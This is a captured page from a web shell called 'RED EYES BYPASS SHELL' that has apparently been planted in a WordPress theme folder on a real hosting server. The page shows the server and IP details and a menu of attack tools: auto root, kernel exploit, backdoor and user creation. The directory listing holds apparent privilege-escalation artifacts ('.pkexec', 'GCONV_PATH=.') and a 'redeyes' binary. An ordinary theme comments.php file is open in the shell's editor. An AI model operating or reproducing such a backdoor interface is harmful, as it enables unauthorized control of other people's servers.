Linux webm007.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.7 | : 216.73.217.26
Cant Read [ /etc/named.conf ]
eglisebaa
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
eglisebaa /
www /
wp-content /
themes /
hallelujah /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
front-page
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
theme-options
[ DIR ]
drwxr-xr-x
theme-specific
[ DIR ]
drwxr-xr-x
trx_addons
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
404.php
330
B
-rw----r--
archive.php
1.06
KB
-rw-r--r--
blog.php
2.04
KB
-rw-r--r--
changelog.txt
416
B
-rw-r--r--
comments.php
7.88
KB
-rw-r--r--
content-404.php
594
B
-rw-r--r--
content-chess.php
5.04
KB
-rw-r--r--
content-classic.php
5.45
KB
-rw-r--r--
content-custom.php
3.4
KB
-rw-r--r--
content-excerpt.php
10.95
KB
-rw-r--r--
content-none-archive.php
828
B
-rw-r--r--
content-none-search.php
933
B
-rw-r--r--
content-page.php
1.52
KB
-rw----r--
content-plain.php
4.83
KB
-rw-r--r--
content-portfolio-gallery.php
3.87
KB
-rw-r--r--
content-portfolio.php
2.5
KB
-rw-r--r--
content-single-in-above.php
3.09
KB
-rw-r--r--
content-single-in-below.php
6.2
KB
-rw-r--r--
content-single-in-over.php
3.09
KB
-rw-r--r--
content-single-in-sticky.php
3.12
KB
-rw-r--r--
content-sticky.php
1.6
KB
-rw-r--r--
content.php
2.24
KB
-rw-r--r--
file-away-iframe-template.php
847
B
-rw-r--r--
footer.php
2.26
KB
-rw-r--r--
front-page.php
1.24
KB
-rw-r--r--
functions.php
30.22
KB
-rw-r--r--
header.php
3.51
KB
-rw----r--
image.php
1.25
KB
-rw-r--r--
index-chess.php
1.49
KB
-rw-r--r--
index-classic.php
2.03
KB
-rw-r--r--
index-custom.php
2.87
KB
-rw-r--r--
index-excerpt.php
1.51
KB
-rw-r--r--
index-plain.php
1.51
KB
-rw-r--r--
index-portfolio.php
4.58
KB
-rw-r--r--
index.php
581
B
-rw-r--r--
page.php
502
B
-rw----r--
readme.txt
3.27
KB
-rw-r--r--
redeyes
10.99
KB
-rwxr-xr-x
screenshot.jpg
135.86
KB
-rw-r--r--
search.php
850
B
-rw-r--r--
sidebar.php
3.08
KB
-rw-r--r--
single.php
6.79
KB
-rw----r--
style.css
155.09
KB
-rw-r--r--
style.scss
126.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * The template to display the Comments. * * The area of the page that contains both current comments * and the comment form. */ /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if ( post_password_required() ) { return; } // Callback for output single comment layout if ( ! function_exists( 'hallelujah_output_single_comment' ) ) { function hallelujah_output_single_comment( $comment, $args, $depth ) { switch ( $comment->comment_type ) { case 'pingback': ?> <li class="trackback"><?php esc_html_e( 'Trackback:', 'hallelujah' ); ?> <?php comment_author_link(); ?><?php edit_comment_link( esc_html__( 'Edit', 'hallelujah' ), '<span class="edit-link">', '<span>' ); ?> <?php break; case 'trackback': ?> <li class="pingback"><?php esc_html_e( 'Pingback:', 'hallelujah' ); ?> <?php comment_author_link(); ?><?php edit_comment_link( esc_html__( 'Edit', 'hallelujah' ), '<span class="edit-link">', '<span>' ); ?> <?php break; default: $author_id = $comment->user_id; $author_link = ! empty( $author_id ) ? get_author_posts_url( $author_id ) : ''; $mult = hallelujah_get_retina_multiplier(); $comment_id = get_comment_ID(); ?> <li id="comment-<?php echo esc_attr( $comment_id ); ?>" <?php comment_class( 'comment_item' ); ?>> <div id="comment_body-<?php echo esc_attr( $comment_id ); ?>" class="comment_body"> <div class="comment_author_avatar"><?php echo get_avatar( $comment, 90 * $mult ); ?></div> <div class="comment_content"> <div class="comment_info"> <h6 class="comment_author"> <?php echo ( ! empty( $author_link ) ? '<a href="' . esc_url( $author_link ) . '">' : '' ) . esc_html( get_comment_author() ) . ( ! empty( $author_link ) ? '</a>' : '' ); ?> </h6> <div class="comment_posted"> <span class="comment_posted_label"><?php esc_html_e( 'Posted', 'hallelujah' ); ?></span> <span class="comment_date"> <?php echo esc_html( get_comment_date( get_option( 'date_format' ) ) ); ?> </span> <span class="comment_time"> <?php echo esc_html( get_comment_date( get_option( 'time_format' ) ) ); ?> </span> <?php if ( 1 == $comment->comment_approved ) { ?> <span class="comment_counters"><?php hallelujah_show_comment_counters('likes,rating'); ?></span> <?php } ?> </div> <?php // Show rating in the comment do_action( 'trx_addons_action_post_rating', 'c' . esc_attr( $comment_id ) ); ?> </div> <div class="comment_text_wrap"> <?php if ( 0 == $comment->comment_approved ) { ?> <div class="comment_not_approved"><?php esc_html_e( 'Your comment is awaiting moderation.', 'hallelujah' ); ?></div> <?php } ?> <div class="comment_text"><?php comment_text(); ?></div> </div> <?php if ( $depth < $args['max_depth'] ) { ?> <div class="reply comment_reply"> <?php comment_reply_link( array_merge( $args, array( 'add_below' => 'comment_body', 'depth' => $depth, 'max_depth' => $args['max_depth'], ) ) ); ?> </div> <?php } ?> </div> </div> <?php break; } } } // Output comments list if ( have_comments() || comments_open() ) { ?> <section class="comments_wrap"> <?php if ( have_comments() ) { ?> <div id="comments" class="comments_list_wrap"> <h3 class="section_title comments_list_title"> <?php $hallelujah_post_comments = get_comments_number(); echo esc_html( $hallelujah_post_comments ); ?> <?php echo esc_html( _n( 'Comment', 'Comments', $hallelujah_post_comments, 'hallelujah' ) ); ?></h3> <ul class="comments_list"> <?php wp_list_comments( array( 'callback' => 'hallelujah_output_single_comment' ) ); ?> </ul><!-- .comments_list --> <?php if ( ! comments_open() && get_comments_number() != 0 && post_type_supports( get_post_type(), 'comments' ) ) { ?> <p class="comments_closed"><?php esc_html_e( 'Comments are closed.', 'hallelujah' ); ?></p> <?php } if ( get_comment_pages_count() > 1 ) { ?> <div class="comments_pagination"><?php paginate_comments_links(); ?></div> <?php } ?> </div><!-- .comments_list_wrap --> <?php } if ( comments_open() ) { ?> <div class="comments_form_wrap"> <div class="comments_form"> <?php $hallelujah_form_style = esc_attr( hallelujah_get_theme_option( 'input_hover' ) ); if ( empty( $hallelujah_form_style ) || hallelujah_is_inherit( $hallelujah_form_style ) ) { $hallelujah_form_style = 'default'; } $hallelujah_commenter = wp_get_current_commenter(); $hallelujah_req = get_option( 'require_name_email' ); $hallelujah_comments_args = apply_filters( 'hallelujah_filter_comment_form_args', array( // class of the 'form' tag 'class_form' => 'comment-form ' . ( 'default' != $hallelujah_form_style ? 'sc_input_hover_' . esc_attr( $hallelujah_form_style ) : '' ), // change the id of send button 'id_submit' => 'send_comment', // change the title of send button 'label_submit' => esc_html__( 'Leave a comment', 'hallelujah' ), // change the title of the reply section 'title_reply' => esc_html__( 'Leave a comment', 'hallelujah' ), 'title_reply_before' => '<h3 class="section_title comments_form_title">', 'title_reply_after' => '</h3>', // remove "Logged in as" 'logged_in_as' => '', // remove text before textarea 'comment_notes_before' => '', // remove text after textarea 'comment_notes_after' => '', 'fields' => array( 'author' => hallelujah_single_comments_field( array( 'form_style' => $hallelujah_form_style, 'field_type' => 'text', 'field_req' => $hallelujah_req, 'field_icon' => 'icon-user', 'field_value' => isset( $hallelujah_commenter['comment_author'] ) ? $hallelujah_commenter['comment_author'] : '', 'field_name' => 'author', 'field_title' => esc_html__( 'Name', 'hallelujah' ), 'field_placeholder' => esc_html__( 'Your Name', 'hallelujah' ), ) ), 'email' => hallelujah_single_comments_field( array( 'form_style' => $hallelujah_form_style, 'field_type' => 'text', 'field_req' => $hallelujah_req, 'field_icon' => 'icon-mail', 'field_value' => isset( $hallelujah_commenter['comment_author_email'] ) ? $hallelujah_commenter['comment_author_email'] : '', 'field_name' => 'email', 'field_title' => esc_html__( 'E-mail', 'hallelujah' ), 'field_placeholder' => esc_html__( 'Your E-mail', 'hallelujah' ), ) ), ), // redefine your own textarea (the comment body) 'comment_field' => hallelujah_single_comments_field( array( 'form_style' => $hallelujah_form_style, 'field_type' => 'textarea', 'field_req' => true, 'field_icon' => 'icon-feather', 'field_value' => '', 'field_name' => 'comment', 'field_title' => esc_html__( 'Comment', 'hallelujah' ), 'field_placeholder' => esc_html__( 'Your comment', 'hallelujah' ), ) ), ) ); comment_form( $hallelujah_comments_args ); ?> </div> </div><!-- /.comments_form_wrap --> <?php } ?> </section><!-- /.comments_wrap --> <?php }
Close